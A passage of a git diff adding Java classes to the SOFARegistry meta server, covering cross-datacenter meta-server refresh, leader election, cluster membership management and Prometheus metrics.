getRemoteMetaServer(); + if (metaServer == null) { + logger.warn("[doRefresh] no meta-server available"); + return; + } + exchange + .getClient(Exchange.META_SERVER_TYPE) + .sendCallback( + metaServer.getNodeUrl(), + request, + new CallbackHandler() { + @Override + @SuppressWarnings("unchecked") + public void onCallback(Channel channel, Object message) { + if (message instanceof DataCenterNodes) { + tryUpdateRemoteDcMetaServerList((DataCenterNodes) message); + } else { + logger.error("[doRefresh][onCallback]unknown type from response: {}", message); + } + } + + @Override + public void onException(Channel channel, Throwable exception) { + if (logger.isErrorEnabled()) { + logger.error( + "[doRefresh][onException][{}]Bolt Request Failure, remote: {}, will try other meta-server", + getDc(), + channel != null ? channel.getRemoteAddress().getHostName() : "unknown", + exception); + } + List metaNodes = getClusterMembers(); + if (metaNodes == null || metaNodes.isEmpty()) { + logger.warn("[doRefresh][onException] no meta-servers available"); + return; + } + requestMetaNodeIndex.set( + requestMetaNodeIndex.incrementAndGet() % getClusterMembers().size()); + // if failure, try again with another meta server. + // good luck with that. :) + doRefresh(retryTimes + 1); + } + + @Override + public Executor getExecutor() { + return scheduled; + } + }, + 5000); + } + + @Override + public void refresh() { + if (!(getLifecycleState().isStarting() || getLifecycleState().isStarted())) { + if (logger.isWarnEnabled()) { + logger.warn("[refresh][not started yet]{}", getDc()); + } + return; + } + counter.incrementAndGet(); + timestamp.set(System.currentTimeMillis()); + if (logger.isInfoEnabled()) { + logger.info("[refresh][{}][times-{}] start", getDc(), getRefreshCount()); + } + doRefresh(0); + if (logger.isInfoEnabled()) { + logger.info("[refresh][{}][times-{}] end", getDc(), getRefreshCount()); + } + } + + @Override + public long getRefreshCount() { + return counter.get(); + } + + @Override + public long getLastRefreshTime() { + return timestamp.get(); + } + + private MetaNode getRemoteMetaServer() { + List metaServers = getClusterMembers(); + return metaServers.isEmpty() + ? null + : metaServers.get(requestMetaNodeIndex.get() % getClusterMembers().size()); + } + + @VisibleForTesting + protected DefaultCrossDcMetaServer setMetaServer(SlotAllocator allocator) { + if (getLifecycleState().isStarted()) { + throw new IllegalStateException("cannot reset meta-server instance while started"); + } + this.allocator = allocator; + return this; + } + + @Override + public VersionedList getClusterMeta() { + return new VersionedList<>(getEpoch(), getClusterMembers()); + } + + public void tryUpdateRemoteDcMetaServerList(DataCenterNodes response) { + String remoteDc = response.getDataCenterId(); + if (!getDc().equalsIgnoreCase(remoteDc)) { + throw new IllegalArgumentException( + String.format( + "MetaServer List Response not correct, ask [%s], received [%s]", getDc(), remoteDc)); + } + DefaultCrossDcMetaServer.this.lock.writeLock().lock(); + try { + Long remoteVersion = response.getVersion(); + if (remoteVersion <= currentVersion.get()) { + if (logger.isDebugEnabled()) { + logger.debug( + "[tryUpdateRemoteDcMetaServerList]shall ignore as version is left behind, " + + "remote[{}], current[{}]", + remoteVersion, + currentVersion.get()); + } + return; + } + if (logger.isWarnEnabled()) { + logger.warn( + "[tryUpdateRemoteDcMetaServerList][{}] remote meta server changed, \nbefore: {}, \nafter: {}", + getDc(), + DefaultCrossDcMetaServer.this.metaServers, + response.getNodes() != null ? response.getNodes().values() : "None"); + } + currentVersion.set(remoteVersion); + if (response.getNodes() != null) { + metaServers = Sets.newHashSet(response.getNodes().values()); + } + } finally { + DefaultCrossDcMetaServer.this.lock.writeLock().unlock(); + } + } + + @VisibleForTesting + DefaultCrossDcMetaServer setAllocator(SlotAllocator allocator) { + this.allocator = allocator; + return this; + } + + @Override + public String toString() { + return "DefaultCrossDcMetaServer{" + + "dcName='" + + dcName + + '\'' + + ", initMetaAddresses=" + + initMetaAddresses + + ", lastRefreshTime=" + + timestamp + + '}'; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultCurrentDcMetaServer.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultCurrentDcMetaServer.java new file mode 100644 index 000000000..12df7eca3 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultCurrentDcMetaServer.java @@ -0,0 +1,128 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.metaserver.impl; + +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.nodes.MetaNode; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.exception.DisposeException; +import com.alipay.sofa.registry.exception.InitializeException; +import com.alipay.sofa.registry.lifecycle.impl.LifecycleHelper; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.cluster.node.NodeAdded; +import com.alipay.sofa.registry.server.meta.cluster.node.NodeRemoved; +import com.alipay.sofa.registry.server.meta.lease.data.DataServerManager; +import com.alipay.sofa.registry.server.meta.lease.session.SessionServerManager; +import com.alipay.sofa.registry.server.meta.metaserver.CurrentDcMetaServer; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.alipay.sofa.registry.util.DatumVersionUtil; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Lists; +import java.util.Collection; +import java.util.List; +import javax.annotation.PostConstruct; +import javax.annotation.PreDestroy; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; + +/** + * @author chen.zhu + *

Nov 23, 2020 + */ +@Component +public class DefaultCurrentDcMetaServer extends LocalMetaServer implements CurrentDcMetaServer { + + @Autowired private NodeConfig nodeConfig; + + public DefaultCurrentDcMetaServer() {} + + public DefaultCurrentDcMetaServer( + SlotManager slotManager, + DataServerManager dataServerManager, + SessionServerManager sessionServerManager) { + super(slotManager, dataServerManager, sessionServerManager); + } + + @PostConstruct + public void postConstruct() throws Exception { + LifecycleHelper.initializeIfPossible(this); + LifecycleHelper.startIfPossible(this); + } + + @PreDestroy + public void preDestory() throws Exception { + LifecycleHelper.stopIfPossible(this); + LifecycleHelper.disposeIfPossible(this); + } + + @Override + protected void doInitialize() throws InitializeException { + super.doInitialize(); + initMetaServers(); + } + + private void initMetaServers() { + Collection metaIpAddresses = + nodeConfig.getMetaNodeIP().get(nodeConfig.getLocalDataCenter()); + List metaNodes = Lists.newArrayList(); + for (String ip : metaIpAddresses) { + metaNodes.add(new MetaNode(new URL(ip), nodeConfig.getLocalDataCenter())); + } + updateClusterMembers(new VersionedList<>(DatumVersionUtil.nextId(), metaNodes)); + } + + @Override + protected void doDispose() throws DisposeException { + super.doDispose(); + } + + @Override + public void renew(MetaNode metaNode) { + super.renew(metaNode); + notifyObservers(new NodeAdded<>(metaNode)); + } + + @Override + public void cancel(MetaNode metaNode) { + super.cancel(metaNode); + notifyObservers(new NodeRemoved(metaNode)); + } + + @VisibleForTesting + DefaultCurrentDcMetaServer setSessionManager(SessionServerManager sessionServerManager) { + this.sessionServerManager = sessionServerManager; + return this; + } + + @VisibleForTesting + DefaultCurrentDcMetaServer setDataServerManager(DataServerManager dataServerManager) { + this.dataServerManager = dataServerManager; + return this; + } + + @VisibleForTesting + DefaultCurrentDcMetaServer setNodeConfig(NodeConfig nodeConfig) { + this.nodeConfig = nodeConfig; + return this; + } + + @VisibleForTesting + DefaultCurrentDcMetaServer setSlotManager(SlotManager slotManager) { + this.slotManager = slotManager; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultMetaLeaderElector.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultMetaLeaderElector.java new file mode 100644 index 000000000..fc7b5c2c6 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultMetaLeaderElector.java @@ -0,0 +1,165 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.metaserver.impl; + +import com.alipay.sofa.registry.exception.InitializeException; +import com.alipay.sofa.registry.lifecycle.impl.LifecycleHelper; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.observer.impl.AbstractLifecycleObservable; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.store.api.elector.LeaderAware; +import com.alipay.sofa.registry.store.api.elector.LeaderElector; +import java.util.List; +import java.util.concurrent.atomic.AtomicBoolean; +import java.util.concurrent.atomic.AtomicReference; +import javax.annotation.PostConstruct; +import javax.annotation.Resource; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; + +/** + * @author chen.zhu + *

Mar 10, 2021 + */ +@Component +public class DefaultMetaLeaderElector extends AbstractLifecycleObservable + implements MetaLeaderService, LeaderAware { + + private final Logger logger = LoggerFactory.getLogger(DefaultMetaLeaderElector.class); + + private final AtomicBoolean wasLeader = new AtomicBoolean(false); + + private final AtomicReference leaderState = new AtomicReference<>(); + + @Autowired private LeaderElector leaderElector; + + @Autowired private MetaServerConfig metaServerConfig; + + @Resource(name = "metaLeaderListeners") + private List listeners; + + public DefaultMetaLeaderElector() {} + + public DefaultMetaLeaderElector( + LeaderElector leaderElector, + MetaServerConfig metaServerConfig, + List listeners) { + this.leaderElector = leaderElector; + this.metaServerConfig = metaServerConfig; + this.listeners = listeners; + } + + @PostConstruct + public void postConstruct() throws Exception { + LifecycleHelper.initializeIfPossible(this); + LifecycleHelper.startIfPossible(this); + } + + @Override + protected void doInitialize() throws InitializeException { + super.doInitialize(); + leaderElector.registerLeaderAware(this); + } + + @Override + public boolean isWarmuped() { + return leaderState.get() != null + && System.currentTimeMillis() - leaderState.get().getStartTime() > getWarmupMilli(); + } + + @Override + public boolean amILeader() { + return leaderElector.amILeader(); + } + + @Override + public String getLeader() { + return leaderElector.getLeader(); + } + + @Override + public long getLeaderEpoch() { + return leaderElector.getLeaderEpoch(); + } + + @Override + public void leaderNotify() { + if (wasLeader.compareAndSet(false, true)) { + leaderState.set( + new LeaderState(LeaderElector.ElectorRole.LEADER, System.currentTimeMillis())); + becomeLeader(); + } + } + + @Override + public void followNotify() { + if (wasLeader.compareAndSet(true, false)) { + leaderState.set( + new LeaderState(LeaderElector.ElectorRole.FOLLOWER, System.currentTimeMillis())); + loseLeader(); + } + } + + protected void becomeLeader() { + if (logger.isInfoEnabled()) { + logger.info("[becomeLeader] change from follower to elector, {}", this.leaderState.get()); + } + if (listeners != null && !listeners.isEmpty()) { + listeners.forEach( + listener -> { + listener.becomeLeader(); + }); + } + } + + private long getWarmupMilli() { + return metaServerConfig.getMetaLeaderWarmupMillis(); + } + + protected void loseLeader() { + if (logger.isInfoEnabled()) { + logger.info("[becomeFollow] change from elector to follower, {}", this.leaderState.get()); + } + if (listeners != null && !listeners.isEmpty()) { + listeners.forEach( + listener -> { + listener.loseLeader(); + }); + } + } + + private static final class LeaderState { + private final LeaderElector.ElectorRole state; + private final long startTime; + + public LeaderState(LeaderElector.ElectorRole state, long startTime) { + this.state = state; + this.startTime = startTime; + } + + public long getStartTime() { + return startTime; + } + + @Override + public String toString() { + return "LeaderState{" + "state=" + state + ", startTime=" + startTime + '}'; + } + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultMetaServerManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultMetaServerManager.java new file mode 100644 index 000000000..ed730de1a --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/DefaultMetaServerManager.java @@ -0,0 +1,154 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.metaserver.impl; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.metaserver.nodes.MetaNode; +import com.alipay.sofa.registry.common.model.metaserver.nodes.SessionNode; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.meta.lease.data.DataServerManager; +import com.alipay.sofa.registry.server.meta.lease.impl.DefaultCrossDcMetaServerManager; +import com.alipay.sofa.registry.server.meta.lease.session.SessionServerManager; +import com.alipay.sofa.registry.server.meta.metaserver.CurrentDcMetaServer; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Maps; +import java.util.List; +import java.util.Map; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; + +/** + * @author chen.zhu + *

Nov 25, 2020 + */ +@Component +public class DefaultMetaServerManager { + + @Autowired private DefaultCrossDcMetaServerManager crossDcMetaServerManager; + + @Autowired private CurrentDcMetaServer currentDcMetaServer; + + @Autowired private SessionServerManager sessionServerManager; + + @Autowired private DataServerManager dataServerManager; + + @Autowired private NodeConfig nodeConfig; + + public NodeChangeResult getSummary(Node.NodeType type) { + switch (type) { + case META: + return (NodeChangeResult) getMetaServerLists(); + case DATA: + return getDataServerLists(); + case SESSION: + return getSessionServerLists(); + default: + break; + } + return null; + } + + private NodeChangeResult getMetaServerLists() { + NodeChangeResult result = new NodeChangeResult<>(Node.NodeType.META); + result.setLocalDataCenter(nodeConfig.getLocalDataCenter()); + Map> nodeMap = Maps.newHashMap(); + Map epochMap = Maps.newHashMap(); + for (String dcName : nodeConfig.getMetaNodeIP().keySet()) { + List metaNodeList = + crossDcMetaServerManager.getOrCreate(dcName).getClusterMembers(); + nodeMap.put(dcName, transform(metaNodeList)); + epochMap.put(dcName, crossDcMetaServerManager.getOrCreate(dcName).getEpoch()); + } + nodeMap.put( + nodeConfig.getLocalDataCenter(), transform(currentDcMetaServer.getClusterMembers())); + epochMap.put(nodeConfig.getLocalDataCenter(), currentDcMetaServer.getEpoch()); + result.setNodes(nodeMap); + result.setDataCenterListVersions(epochMap); + + result.setVersion(currentDcMetaServer.getEpoch()); + return result; + } + + private NodeChangeResult getSessionServerLists() { + NodeChangeResult result = new NodeChangeResult<>(Node.NodeType.SESSION); + result.setLocalDataCenter(nodeConfig.getLocalDataCenter()); + Map> nodeMap = Maps.newHashMap(); + Map epochMap = Maps.newHashMap(); + nodeMap.put( + nodeConfig.getLocalDataCenter(), + transform(sessionServerManager.getSessionServerMetaInfo().getClusterMembers())); + result.setNodes(nodeMap); + result.setVersion(sessionServerManager.getEpoch()); + result.setDataCenterListVersions(epochMap); + return result; + } + + private NodeChangeResult getDataServerLists() { + NodeChangeResult result = new NodeChangeResult<>(Node.NodeType.DATA); + result.setLocalDataCenter(nodeConfig.getLocalDataCenter()); + Map> nodeMap = Maps.newHashMap(); + Map epochMap = Maps.newHashMap(); + nodeMap.put( + nodeConfig.getLocalDataCenter(), + transform(dataServerManager.getDataServerMetaInfo().getClusterMembers())); + result.setNodes(nodeMap); + result.setVersion(dataServerManager.getEpoch()); + result.setDataCenterListVersions(epochMap); + return result; + } + + private Map transform(List nodes) { + Map map = Maps.newHashMap(); + for (T node : nodes) { + map.put(node.getNodeUrl().getIpAddress(), node); + } + return map; + } + + @VisibleForTesting + DefaultMetaServerManager setCrossDcMetaServerManager( + DefaultCrossDcMetaServerManager crossDcMetaServerManager) { + this.crossDcMetaServerManager = crossDcMetaServerManager; + return this; + } + + @VisibleForTesting + DefaultMetaServerManager setCurrentDcMetaServer(CurrentDcMetaServer currentDcMetaServer) { + this.currentDcMetaServer = currentDcMetaServer; + return this; + } + + @VisibleForTesting + DefaultMetaServerManager setSessionManager(SessionServerManager sessionServerManager) { + this.sessionServerManager = sessionServerManager; + return this; + } + + @VisibleForTesting + DefaultMetaServerManager setDataServerManager(DataServerManager dataServerManager) { + this.dataServerManager = dataServerManager; + return this; + } + + @VisibleForTesting + DefaultMetaServerManager setNodeConfig(NodeConfig nodeConfig) { + this.nodeConfig = nodeConfig; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/LocalMetaServer.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/LocalMetaServer.java new file mode 100644 index 000000000..8efc19c75 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/metaserver/impl/LocalMetaServer.java @@ -0,0 +1,131 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.metaserver.impl; + +import com.alipay.sofa.registry.common.model.metaserver.cluster.VersionedList; +import com.alipay.sofa.registry.common.model.metaserver.nodes.MetaNode; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.server.meta.lease.data.DataServerManager; +import com.alipay.sofa.registry.server.meta.lease.session.SessionServerManager; +import com.alipay.sofa.registry.server.meta.metaserver.CurrentDcMetaServer; +import com.alipay.sofa.registry.server.meta.slot.SlotManager; +import com.google.common.collect.Lists; +import com.google.common.collect.Sets; +import java.util.List; +import java.util.concurrent.atomic.AtomicLong; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author chen.zhu + *

Dec 14, 2020 + */ +public class LocalMetaServer extends AbstractMetaServer implements CurrentDcMetaServer { + + private final AtomicLong currentEpoch = new AtomicLong(); + + @Autowired protected SlotManager slotManager; + + @Autowired protected DataServerManager dataServerManager; + + @Autowired protected SessionServerManager sessionServerManager; + + public LocalMetaServer() {} + + public LocalMetaServer( + SlotManager slotManager, + DataServerManager dataServerManager, + SessionServerManager sessionServerManager) { + this.slotManager = slotManager; + this.dataServerManager = dataServerManager; + this.sessionServerManager = sessionServerManager; + } + + @Override + public SlotTable getSlotTable() { + return slotManager.getSlotTable(); + } + + public long getEpoch() { + return currentEpoch.get(); + } + + @Override + public List getClusterMembers() { + return Lists.newArrayList(metaServers); + } + + @Override + public void updateClusterMembers(VersionedList versionedMetaNodes) { + if (versionedMetaNodes.getEpoch() <= currentEpoch.get()) { + logger.warn( + "[updateClusterMembers]Epoch[{}] is less than current[{}], ignore: {}", + currentEpoch.get(), + versionedMetaNodes.getEpoch(), + versionedMetaNodes.getClusterMembers()); + } + lock.writeLock().lock(); + try { + logger.warn( + "[updateClusterMembers] update meta-servers, \nprevious[{}]: {} \ncurrent[{}]: {}", + currentEpoch.get(), + getClusterMembers(), + versionedMetaNodes.getEpoch(), + versionedMetaNodes.getClusterMembers()); + currentEpoch.set(versionedMetaNodes.getEpoch()); + metaServers = Sets.newHashSet(versionedMetaNodes.getClusterMembers()); + } finally { + lock.writeLock().unlock(); + } + } + + @Override + public DataServerManager getDataServerManager() { + return dataServerManager; + } + + @Override + public SessionServerManager getSessionServerManager() { + return sessionServerManager; + } + + @Override + public void renew(MetaNode metaNode) { + lock.writeLock().lock(); + try { + logger.info("[renew]meta node [{}] renewed", metaNode); + metaServers.add(metaNode); + } finally { + lock.writeLock().unlock(); + } + } + + @Override + public void cancel(MetaNode renewal) { + lock.writeLock().lock(); + try { + logger.info("[cancel]meta node [{}] removed", renewal); + metaServers.remove(renewal); + } finally { + lock.writeLock().unlock(); + } + } + + @Override + public VersionedList getClusterMeta() { + return new VersionedList<>(getEpoch(), getClusterMembers()); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/Metrics.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/Metrics.java new file mode 100644 index 000000000..f4a788366 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/monitor/Metrics.java @@ -0,0 +1,340 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.monitor; + +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import io.prometheus.client.Gauge; +import io.prometheus.client.Histogram; + +/** + * @author chen.zhu + *

Mar 03, 2021 + */ +public class Metrics { + + public static final class SlotArrange { + + private static final Logger LOGGER = LoggerFactory.getLogger(SlotArrange.class); + + private static long start = -1L; + + private static final Histogram SLOT_ARRANGE_HISTOGRAM = + Histogram.build() + .namespace("meta") + .subsystem("slot_arrange") + .name("leader_migrating_secs") + .help("migrating in seconds.") + .buckets(3, 5, 10, 20, 30, 60, 120, 180, 240) + .register(); + + public static void begin() { + start = System.currentTimeMillis(); + } + + public static void end() { + try { + SLOT_ARRANGE_HISTOGRAM.observe(System.currentTimeMillis() - start); + } catch (Throwable throwable) { + LOGGER.error("[end]", throwable); + } + } + } + + public static final class Heartbeat { + + private static final Logger LOGGER = LoggerFactory.getLogger(Heartbeat.class); + + private static final Gauge DATA_HEART_BEAT_GUAGE = + Gauge.build() + .namespace("meta") + .subsystem("heartbeat") + .name("data_heartbeat") + .help("data heartbeat times") + .labelNames("data_server") + .register(); + + private static final Gauge SESSION_HEART_BEAT_GUAGE = + Gauge.build() + .namespace("meta") + .subsystem("heartbeat") + .name("session_heartbeat") + .help("session heartbeat times") + .labelNames("session_server") + .register(); + + public static void onDataHeartbeat(String dataServer) { + try { + DATA_HEART_BEAT_GUAGE.labels(dataServer).set(1); + } catch (Throwable th) { + LOGGER.error("[onDataHeartbeat]", th); + } + } + + public static void onDataEvict(String dataServer) { + try { + DATA_HEART_BEAT_GUAGE.labels(dataServer).set(0); + } catch (Throwable th) { + LOGGER.error("[onDataEvict]", th); + } + } + + public static void onSessionHeartbeat(String session) { + try { + SESSION_HEART_BEAT_GUAGE.labels(session).set(1); + } catch (Throwable th) { + LOGGER.error("[onSessionHeartbeat]", th); + } + } + + public static void onSessionEvict(String session) { + try { + SESSION_HEART_BEAT_GUAGE.labels(session).set(0); + } catch (Throwable th) { + LOGGER.error("[onSessionEvict]", th); + } + } + } + + public static final class SlotBalance { + + private static final Logger LOGGER = LoggerFactory.getLogger(SlotBalance.class); + + private static final Gauge HIGH_LEADER_MIGRATE = + Gauge.build() + .namespace("meta") + .subsystem("slot_balancer") + .name("high_leader_migrate") + .help("high leader migrate gauge") + .labelNames("from", "to", "slot") + .register(); + + private static final Gauge HIGH_LEADER_UPGRADE = + Gauge.build() + .namespace("meta") + .subsystem("slot_balancer") + .name("high_leader_upgrade") + .help("high leader upgrade gauge") + .labelNames("from", "to", "slot") + .register(); + + private static final Gauge HIGH_FOLLOWER_BALANCE = + Gauge.build() + .namespace("meta") + .subsystem("slot_balancer") + .name("high_follower_balance") + .help("data to swap slot follower out") + .labelNames("from", "to", "slot") + .register(); + + private static final Gauge LOW_FOLLOWER_BALANCE = + Gauge.build() + .namespace("meta") + .subsystem("slot_balancer") + .name("low_follower_balance") + .help("data to swap slot follower in") + .labelNames("from", "to", "slot") + .register(); + + private static final Gauge LOW_LEADER_BALANCE = + Gauge.build() + .namespace("meta") + .subsystem("slot_balancer") + .name("low_leader_balance") + .help("data to swap slot leader out") + .labelNames("from", "to", "slot") + .register(); + + public static void onLeaderUpgrade(String from, String to, int slotId) { + try { + HIGH_LEADER_MIGRATE.labels(from, to, String.valueOf(slotId)).inc(); + } catch (Throwable throwable) { + LOGGER.error("[onLeaderUpgrade]", throwable); + } + } + + public static void onLeaderMigrate(String from, String to, int slotId) { + try { + HIGH_LEADER_UPGRADE.labels(from, to, String.valueOf(slotId)).inc(); + } catch (Throwable throwable) { + LOGGER.error("[onLeaderMigrate]", throwable); + } + } + + public static void onHighFollowerMigrate(String from, String to, int slotId) { + try { + HIGH_FOLLOWER_BALANCE.labels(from, to, String.valueOf(slotId)).inc(); + } catch (Throwable throwable) { + LOGGER.error("[onHighFollowerMigrate]", throwable); + } + } + + public static void onLowFollowerMigrate(String from, String to, int slotId) { + try { + LOW_FOLLOWER_BALANCE.labels(from, to, String.valueOf(slotId)).inc(); + } catch (Throwable throwable) { + LOGGER.error("[onLowFollowerMigrate]", throwable); + } + } + + public static void onLowLeaderReplace(String from, String to, int slotId) { + try { + LOW_LEADER_BALANCE.labels(from, to, String.valueOf(slotId)).inc(); + } catch (Throwable throwable) { + LOGGER.error("[onLowLeaderReplace]", throwable); + } + } + } + + public static final class SlotAssign { + + private static final Logger LOGGER = LoggerFactory.getLogger(SlotAssign.class); + + private static final Gauge LEADER_ASSIGN_GAUGE = + Gauge.build() + .namespace("meta") + .subsystem("slot_assigner") + .name("assign_leader") + .help("leader assign") + .labelNames("leader", "slot") + .register(); + + private static final Gauge FOLLOWER_ASSIGN_GAUGE = + Gauge.build() + .namespace("meta") + .subsystem("slot_assigner") + .name("assign_follower") + .help("follower assign") + .labelNames("follower", "slot") + .register(); + + public static void onSlotLeaderAssign(String dataServer, int slotId) { + try { + LEADER_ASSIGN_GAUGE.labels(dataServer, String.valueOf(slotId)).inc(); + } catch (Throwable throwable) { + LOGGER.error("[onSlotLeaderAssign]", throwable); + } + } + + public static void onSlotFollowerAssign(String dataServer, int slotId) { + try { + FOLLOWER_ASSIGN_GAUGE.labels(dataServer, String.valueOf(slotId)).inc(); + } catch (Throwable throwable) { + LOGGER.error("[onSlotFollowerAssign]", throwable); + } + } + } + + public static final class DataSlot { + + private static final Logger LOGGER = LoggerFactory.getLogger(DataSlot.class); + + private static final Gauge LEADER_ASSIGN_GAUGE = + Gauge.build() + .namespace("meta") + .subsystem("data") + .name("leader_slot_number") + .help("leader slot number") + .labelNames("data_server") + .register(); + + private static final Gauge FOLLOWER_ASSIGN_GAUGE = + Gauge.build() + .namespace("meta") + .subsystem("data") + .name("follower_slot_number") + .help("follower slot number") + .labelNames("data_server") + .register(); + + private static final Gauge DATA_SLOT_TABLE_LAG_TIMES = + Gauge.build() + .namespace("meta") + .subsystem("data") + .name("data_server_slot_lag") + .help("data server slot is behind meta") + .labelNames("data_server") + .register(); + + private static final Gauge DATA_SLOT_GREATER_THAN_META = + Gauge.build() + .namespace("meta") + .subsystem("data") + .name("data_slot_greater_than_meta") + .help("data server slot epoch greater than meta") + .labelNames("data_server", "slotId") + .register(); + + private static final Gauge DATA_SLOT_NOT_EQUALS_META = + Gauge.build() + .namespace("meta") + .subsystem("data") + .name("data_slot_not_equals_meta") + .help("data server slot is not as expected as meta") + .labelNames("data_server") + .register(); + + public static void setLeaderNumbers(String dataServer, int leaderNum) { + try { + LEADER_ASSIGN_GAUGE.labels(dataServer).set(leaderNum); + } catch (Throwable throwable) { + LOGGER.error("[setLeaderNumbers]", throwable); + } + } + + public static void setFollowerNumbers(String dataServer, int followerNum) { + try { + FOLLOWER_ASSIGN_GAUGE.labels(dataServer).set(followerNum); + } catch (Throwable throwable) { + LOGGER.error("[setFollowerNumbers]", throwable); + } + } + + public static void setDataServerSlotLagTimes(String dataServer, int times) { + try { + DATA_SLOT_TABLE_LAG_TIMES.labels(dataServer).set(times); + } catch (Throwable throwable) { + LOGGER.error("[setDataServerSlotLagTimes]", throwable); + } + } + + public static long getDataServerSlotLagTimes(String dataServer) { + try { + return (long) DATA_SLOT_TABLE_LAG_TIMES.labels(dataServer).get(); + } catch (Throwable throwable) { + LOGGER.error("[setDataServerSlotLagTimes]", throwable); + } + return 0; + } + + public static void setDataSlotGreaterThanMeta(String dataServer, int slotId) { + try { + DATA_SLOT_GREATER_THAN_META.labels(dataServer, String.valueOf(slotId)).set(1); + } catch (Throwable throwable) { + LOGGER.error("[setDataServerSlotLagTimes]", throwable); + } + } + + public static void setDataReportNotStable(String dataServer, int slotId) { + try { + DATA_SLOT_NOT_EQUALS_META.labels(dataServer, 